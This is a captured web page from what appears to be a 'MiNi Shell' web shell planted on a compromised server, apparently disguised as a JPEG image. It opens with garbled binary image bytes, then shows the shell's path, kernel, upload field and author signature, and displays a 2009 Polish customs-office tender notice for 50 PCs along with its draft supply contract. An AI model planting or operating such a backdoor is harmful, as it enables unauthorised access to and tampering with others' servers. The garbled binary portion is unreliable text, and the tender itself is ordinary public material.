JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090515/151996-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa do Wydziału Centrum Analityczne Administracji Celnej Izba Celna w Warszawie 50 sztuk zestawów komputerowych typu PC</b><br>
<b>Numer ogłoszenia: 151996 - 2009; data zamieszczenia: 15.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Izba Celna w Warszawie , Erazma Ciołka 14 A, 01-443 Warszawa, woj. mazowieckie, tel. 022 5104927, faks 022 8116841.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.warszawa.ic.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa do Wydziału Centrum Analityczne Administracji Celnej Izba Celna w Warszawie 50 sztuk zestawów komputerowych typu PC.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa do Wydziału Centrum Analityczne Administracji Celnej Izba Celna w Warszawie, Warszawa ul. 17 Stycznia 49, sala 250, II piętro, 50 sztuk zestawów komputerowych typu PC..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.30.00-5.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawcy składający wnioski o dopuszczenie do udziału w licytacji są zobowiązani do wniesienia wadium w wysokości 5 000 zł. w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia  9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. 2007 r. Nr 42, poz. 275). Poręczenie wystawione przez bank zagraniczny musi być potwierdzone przez bank krajowy. Wadium w formie pieniędzy należy wpłacić przelewem na konto zamawiającego:
Bank PEKAO S.A. VI O/Warszawa 20 1240 1082 1111 0000 0404 6507
Wadium w pozostałych akceptowanych formach należy złożyć w siedzibie Zamawiającego w Warszawie, ul. Erazma Ciołka 14A, w pokoju 520, V piętro, Wydział Logistyki Izby Celnej w Warszawie. Wadium winno obejmować cały okres związania ofertą, tj. 30 dni. Termin wniesienia wadium upływa wraz z terminem składania wniosków.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> ) spełniają warunki określone w art. 22 ust. 1 pkt.1-4 ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych, 
2) nie podlegają wykluczeniu z ubiegania się o udzielenie zamówienia na podstawie art.24 uPzp,
4) spełniają wszystkie warunki i wymagania, które zostały określone w specyfikacji warunków zamówienia
3.2. Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie dokumentów załączonych do wniosku o dopuszczenie do udziału w licytacji elektronicznej..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz wniosku o dopuszczenie do udziału w licytacji elektronicznej
2. Aktualny na dzień otwarcia oferty odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
Uwaga: W przypadku składania oferty przez Wykonawców występujących wspólnie, ww. dokument  musi złożyć każdy z Wykonawców występujących wspólnie.
3. Pełnomocnictwo. W przypadku gdy upoważnienie osoby podpisującej wniosek o dopuszczenie do udziału w licytacji elektronicznej oraz inne dokumenty  nie wynika wprost z dokumentów stwierdzających status prawny Wykonawcy (odpisu z właściwego rejestru lub zaświadczenia o wpisie do ewidencji działalności gospodarczej), to do oferty należy dołączyć oryginał lub poświadczoną za zgodność z oryginałem przez notariusza kopię stosownego pełnomocnictwa wystawioną przez osobę(y) uprawnioną do reprezentowania Wykonawcy. Pełnomocnictwo w swej treści powinno bezpośrednio i jednoznacznie wskazywać na uprawnienie określonej osoby do reprezentowania Wykonawcy.
4. Oświadczenie Wykonawcy o spełnieniu wymagań określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych (załącznik nr 1 do wniosku).
Uwaga: W przypadku składania oferty przez Wykonawców występujących wspólnie, ww. dokument  musi złożyć każdy z Wykonawców występujących wspólnie.
5. Dowód wniesienia wadium.
6. Dokument potwierdzający zgodność komputera z Windows Vista Business PL.(dopuszcza się wydruk  ze strony WWW producenta systemu).
7. Kopie certyfikatów ISO9001 oraz ISO14001 producenta dla monitora i jednostki centralnej.
8. Specyfikację cech, parametrów i funkcjonalności oraz wyposażenia jednostek centralnych PC z monitorami (załącznik nr 2 do formularz wniosku).
9. Dokumenty składane są w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez osobę (osoby) uprawnione do reprezentowania wykonawcy.
10. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę.
11. Zarówno wniosek o dopuszczenie do udziału w licytacji elektronicznej, jak i załączniki  muszą być podpisane przez osoby upoważnione do reprezentowania Wykonawcy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.warszawa.ic.gov.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> Wymagania formalne:
Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem http:licytacje.uzp.gov.pl - nie jest wymagany podpis elektroniczny.
Wykonawca, aby umożliwić Zamawiającemu dopuszczenie do udziału w licytacji, zobowiązany jest do przekazania zarejestrowanego w systemie loginu najpóźniej jeden dzień przed terminem otwarcia licytacji. 
Wymagania techniczne:
Komputer klasy PC (lub równoważnej) spełniający wymogi techniczne określone przez producentów przeglądarek internetowych Ms Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej, z zainstalowaną jedną z w.w. przeglądarek lub przeglądarką równoważną, podłączony do sieci Internet..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. W toku licytacji elektronicznej Wykonawcy składają kolejne korzystniejsze postąpienia. 
2. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia.
3. Oferta złożona w toku licytacji przestaje wiązać, gdy inny Wykonawca złożył ofertę korzystniejszą.
4. W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto za całość zamówienia wyrażoną w złotych oraz ewentualnie w groszach; grosze należy oddzielić od złotych kropką. 
5. Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej, co najmniej o kwotę minimalnego postąpienia.
6. Zamawiający przyjął za minimalne postąpienie wartość 100.00 zł. brutto (słownie sto złotych). System nie przyjmie postąpienia, którego wysokość jest mniejsza od określonego minimalnego postąpienia.
7. W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział licytacji elektronicznej, a także o cenach złożonych ofert, z tym że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców.
8. Zamawiający przyjął za cenę wywoławczą brutto kwotę 250 000.00 zł. (słownie: dwieście pięćdziesiąt tysięcy zł).
9. Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto za całość zamówienia.
10. Zamawiający zamyka licytację, gdy w ciągu 20 minut od otwarcia licytacji nie zostanie złożona żadna oferta lub, gdy w ciągu 20 minut od złożenia oferty przez jednego z Wykonawców nie zostanie złożona żadna inna oferta..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">licytacja zostanie zamknięta jeżeli w ciągu 20 minut od otwarcia nie zostanie złożona żadna oferta lub gdy w ciągu 20 minut od ostatniego złożonego postąpienia nie zostanie złożone nowe postąpienie</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 25.05.2009 godzina 09:00, miejsce: Izba Celna w Warszawie, ul. Erazma Ciołka 14 A, pok. 520,  01-443 Warszawa.</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> 5 dni od daty przekazania zaproszeń do udziału w licytacji, godz. 12:00.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> licytacja zostanie zamknięta jeżeli w ciągu 20 minut od otwarcia nie zostanie złożona żadna oferta lub gdy w ciągu 20 minut od ostatniego złożonego postąpienia nie zostanie złożone nowe postąpienie.</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> licytacja zostanie zamknięta jeżeli w ciągu 20 minut od otwarcia nie zostanie złożona żadna oferta lub gdy w ciągu 20 minut od ostatniego złożonego postąpienia nie zostanie złożone nowe postąpienie.</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nazwa i adres wykonawcy, którego ofertę wybrano zostanie podany bezpośrednio po zamknięciu licytacji na stronie na któreje odbywała się licytacja http://licytacje.uzp.gov.pl oraz na stronie www zamawiającego www.warszawa.ic.gov.pl. Wzór umowy:
UMOWA Nr IC -               09   

zawarta w dniu 2009 r.  w Warszawie pomiędzy:  Dyrektorem Izby Celnej w Warszawie z siedzibą w Warszawie, 
01-443 Warszawa, ul. Erazma Ciołka 14A, NIP 524-031-10-50, REGON 000143863
reprezentowanym przez: 
Janusz Sawę- p.o. Dyrektora Izby Celnej w Warszawie,
Danutę Kubow -  Głównego Księgowego Izby Celnej w Warszawie,
zwanym w dalszej treści umowy  Odbiorcą
a 
z siedzibą, zarejestrowaną, pod numerem, posiadającą NIP,  REGON,   reprezentowaną przez: 



zwaną w  dalszej treści umowy Dostawcą.
 
Umowa została zawarta po przeprowadzeniu postępowania określonego w ustawie z dnia 29 stycznia  2004 r. Prawo zamówień publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), dla zamówienia publicznego udzielonego w trybie licytacji elektronicznej.
§ 1.
Przedmiot umowy
1. Przedmiotem niniejszej umowy jest dostawa 50 sztuk zestawów komputerowych typu PC :

jednostka centralna typ/model

monitor typ/model 

cena jednostkowa zestawu- zł. brutto (słownie złotych:), 

zwanych dalej sprzętem

2. Szczegółowe parametry i wymagania techniczne sprzętu określone zostały w Załączniku  Nr 1 do niniejszej umowy.
§ 2.
Warunki realizacji umowy
1. Miejscem dostawy jest Wydział Centrum Analityczne Administracji Celnej Izba Celna w Warszawie, Warszawa ul. 17 Stycznia 49, sala 250, II piętro. Sprzęt będzie użytkowany w siedzibie Ministerstwa Finansów i na obszarze właściwości terytorialnej Izb Celnych w Polsce.
2. Odbiorca dokona odbioru ilościowo-jakościowego sprzętu, przy udziale przedstawiciela Dostawcy, co zostanie potwierdzone protokołem odbioru ilościowo-jakościowego podpisanym przez przedstawicieli stron po sprawdzeniu całości sprzętu, którego wzór określa Załącznik Nr 2 do niniejszej umowy. Odbiór będzie polegał na stwierdzeniu zgodności sprzętu z dostarczoną dokumentacją w zakresie parametrów technicznych i funkcjonalnych, sprawdzeniu ilościowym elementów dostawy, stwierdzeniu poprawności działania i braku uszkodzeń mechanicznych. Odbiór zostanie dokonany w terminie do 20 dni od dnia dostarczenia sprzętu.
3. Sprzęt zostanie dostarczony Odbiorcy w stanie nadającym się do użytkowania zgodnie z przeznaczeniem. 
4. Dostawca zobowiązany jest dostarczyć sprzęt w terminie do 60 dni od daty podpisania umowy. Realizacja umowy nastąpi w dniu podpisania przez strony protokołu, o którym mowa w  ust. 2.
5. Ewentualne usterki stwierdzone przy odbiorze sprzętu zostaną usunięte przez Dostawcę w terminie 2 dni roboczych od daty ich zgłoszenia.
§ 3.
Cena
1. Strony ustalają, iż wartość przedmiotu umowy wynosi -zł (słownie złotych: )  w tym podatek VAT - zł. (słownie złotych: ).
2. Cena brutto zawiera:
1) wartość towaru powiększoną o podatek VAT naliczony zgodnie z przepisami obowiązującymi w dniu sprzedaży. 
2) koszt pakowania, znakowania i transportu do Odbiorcy, wraz ze stosownym ubezpieczeniem przewozowym,
3) koszt gwarancji liczonej od daty dostawy do Odbiorcy.
3. Zapłata będzie dokonana przez Odbiorcę po dostawie towarów będących przedmiotem umowy, w terminie 14 dni od dnia dostarczenia faktury i nie wcześniej niż przed podpisaniem protokołu, o którym mowa w § 2 ust. 2 umowy, potwierdzającego bez zastrzeżeń odbiór całości zamówienia, na konto bankowe Dostawcy wskazane na fakturze. 
4. Za dzień dokonania płatności strony uznają datę obciążenia rachunku Odbiorcy.
5. Wierzytelności wynikające z umowy nie mogą być przenoszone na osobę trzecią bez zgody Odbiorcy.
6. Za opóźnienie w zapłacie należności określonej w ust. 1, Dostawca ma prawo naliczyć Odbiorcy odsetki ustawowe za okres od dnia wymagalności do dnia zapłaty , od wartości brutto towaru będącego przedmiotem prawidłowo wykonanej, zafakturowanej i niezapłaconej dostawy.
§ 4.
Warunki gwarancji
1. Dostawca udziela Odbiorcy gwarancji na dostarczony sprzęt na okres nie mniejszy niż 36 miesięcy. Bieg gwarancji rozpocznie się od daty podpisania bez zastrzeżeń protokołu odbioru ilościowo-jakościowego sprzętu. 
2. Dostawca jest zobowiązany wykonywać obowiązki wynikające z gwarancji na swój koszt.
3. Serwis gwarancyjny świadczony będzie przez Dostawcę w miejscu użytkowania sprzętu. Dopuszcza się możliwość naprawy w serwisie Dostawcy po wcześniejszej osobistej konsultacji technicznej pracownika serwisu Dostawcy w miejscu użytkowania sprzętu i zakwalifikowaniu naprawy  jako niemożliwej do przeprowadzenia na miejscu.
4. W przypadku dokonania naprawy gwarancyjnej poprzez wymianę elementów, w sprzęcie zostaną zainstalowane fabrycznie nowe, identyczne i oryginalne elementy lub za zgodą Odbiorcy fabrycznie nowe elementy o parametrach nie gorszych niż wymieniane.
5. Przedstawiciel serwisu technicznego Dostawcy zobowiązany jest do stawienia się na miejsce użytkowania zgłoszonego sprzętu celem konsultacji technicznej w ciągu 2 dni roboczych od chwili zgłoszenia awarii, wady, usterki przez Odbiorcę. 
6. Dostawca zobowiązany jest do usunięcia awarii ,wady, usterki, a jeżeli zachodzi taka konieczność do dostarczenia i uruchomienia w okresie naprawy sprzętu zastępczego wolnego od wad i w konfiguracji równoważnej, w terminie do 5 dni od zgłoszonej awarii, wady, usterki.
7. W przypadku dostarczenia sprzętu zastępczego Dostawca zobowiązuje się do usunięcia awarii, wady, usterki w terminie nie dłuższym niż 30 dni od dnia zgłoszenia awarii, wady, usterki.
8. W przypadku wymiany sprzętu na nowy lub dokonania naprawy przez Dostawcę okres gwarancji biegnie na nowo od chwili dostarczenia, zainstalowania, uruchomienia oraz stwierdzenia poprawności działania sprzętu.
9. Usunięcie awarii, wady, usterki, dostarczenie sprzętu zastępczego, wymiana na sprzęt nowy, oraz wymiana podzespołu obejmuje również zainstalowanie i uruchomienie sprzętu w miejscu użytkowania.
10. Dyski twarde w komputerach muszą być objęte gwarancją przed-awaryjną polegającą na wymianie zagrożonego awarią dysku na nowy na podstawie stosownego raportu wygenerowanego oprogramowaniem producenta dostarczonym przez Dostawcę wraz ze sprzętem (diagnostycznym bądź monitorującym).
11. Przy naprawie komputera, wymianie komputera lub wymianie niesprawnego dysku twardego kompletny dysk twardy pozostaje w miejscu użytkowania sprzętu. Po wcześniejszym ustaleniu i wyrażeniu zgody przez Odbiorcę dopuszcza się możliwość demontażu przez Dostawcę części elektronicznych, elementów obudowy dysku  z wyłączeniem nośnika danych. 
12. W przypadku wystąpienia, w ciągu pierwszego roku gwarancji, awarii, wady bądź usterki tego samego elementu (podzespołu) w więcej niż 3 komputerach PC, Dostawca zobowiązany jest, na żądanie Odbiorcy, do wymiany ww. elementu (podzespołu) na swój koszt, we wszystkich komputerach stanowiących przedmiot umowy. Wymiana musi zostać wykonana w terminie do 1 miesiąca od otrzymania żądania.
13. Dostawca zobowiązany jest do dostarczania komputera z BIOS-em płyty głównej nie starszym niż 6 miesięcy.
14. Wszelkie zawiadomienia o awariach, wadach,  usterkach winny być zgłaszane na formularzu zgłoszenia serwisowego przez pracownika Wydziału Informatyki Odbiorcy pod Nr telefonu, faxu, Wzór zgłoszenia uszkodzenia stanowi załącznik Nr 3 do niniejszej mowy.
15. Z każdej przeprowadzonej naprawy sporządzony zostanie protokół podpisany przez przedstawicieli stron, którego wzór stanowi załącznik Nr 4 do niniejszej umowy. 
§ 5.
Kary umowne
 1. Dostawca zapłaci Odbiorcy karę umowną:
1)	jeżeli Odbiorca uzna, iż Dostawca wykonuje dostawę wadliwie lub w sposób sprzeczny z umową, a w szczególności dostarcza sprzęt niezgodnie ze złożoną ofertą - w wysokości 10 % ceny brutto określonej w § 3 ust.1, 
2)	za opóźnienie w oddaniu sprzętu - w wysokości 0,1 % ceny brutto określonej  w § 3 ust.1 za każdy dzień opóźnienia, 
3)	za opóźnienie w usunięciu usterek stwierdzonych przy odbiorze - w wysokości 0,2 % ceny brutto określonej w § 3 ust.1 za każdy dzień opóźnienia,
4)	w przypadku niedotrzymania w okresie gwarancji terminów napraw i/ lub wymiany sprzętu na nowy, wolny od wad  - w wysokości 0,5% ceny brutto sprzętu, względem którego nie dotrzymano terminu, za każdy dzień uchybienia terminowi.
2. Wysokość kary umownej lub jej zapłata może ulec zmianie (lub odstąpieniu) jeśli Dostawca przedstawi odbiorcy w ciągu trzech dni od dnia ostatecznego zakończenia realizacji umowy wiarygodny dowód że zwłoka lub inne zdarzenie uzasadniające naliczenie kary umownej nastąpiły z przyczyn za które Dostawca nie ponosi odpowiedzialności. 
3. Kwota kar umownych  będzie potrącona bezpośrednio przy zapłacie faktury dotyczącej  realizacji przedmiotu umowy. Kary za opóźnienie  napraw gwarancyjnych będą dochodzone na drodze sądowej.
4.Ustalenie kar umownych, o których mowa w ust.1 nie wyłącza uprawnienia Odbiorcy do żądania odszkodowania przekraczającego wysokość ww. kar na zasadach ogólnych.
§ 6.
Postanowienia końcowe
1.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży       w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Odbiorca może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach. Dostawca ma prawo żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.  
2.	Odbiorca zastrzega sobie prawo natychmiastowego odstąpienia od umowy z przyczyn leżących po stronie Dostawcy, w szczególności w przypadku niezrealizowania dostawy w terminie.  
3.	Wszelkie zmiany i uzupełnienia niniejszej umowy wymagają zachowania formy pisemnej pod rygorem nieważności.
4. Integralną część umowy stanowią załączniki.
5. W sprawach nie uregulowanych niniejszą umową mają zastosowanie przepisy ustawy Prawo zamówień publicznych i Kodeksu cywilnego. 
6. Sprawy sporne rozstrzygane będą przez sąd powszechny, właściwy dla siedziby Odbiorcy.
7. Umowa została sporządzona w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze stron.

Załączniki:
1.	Parametry techniczne sprzętu,
2.	Protokół odbioru ilościowo-jakościowego,
3.	Druk zgłoszenia uszkodzenia,

Creat By MiNi SheLL
Email: jattceo@gmail.com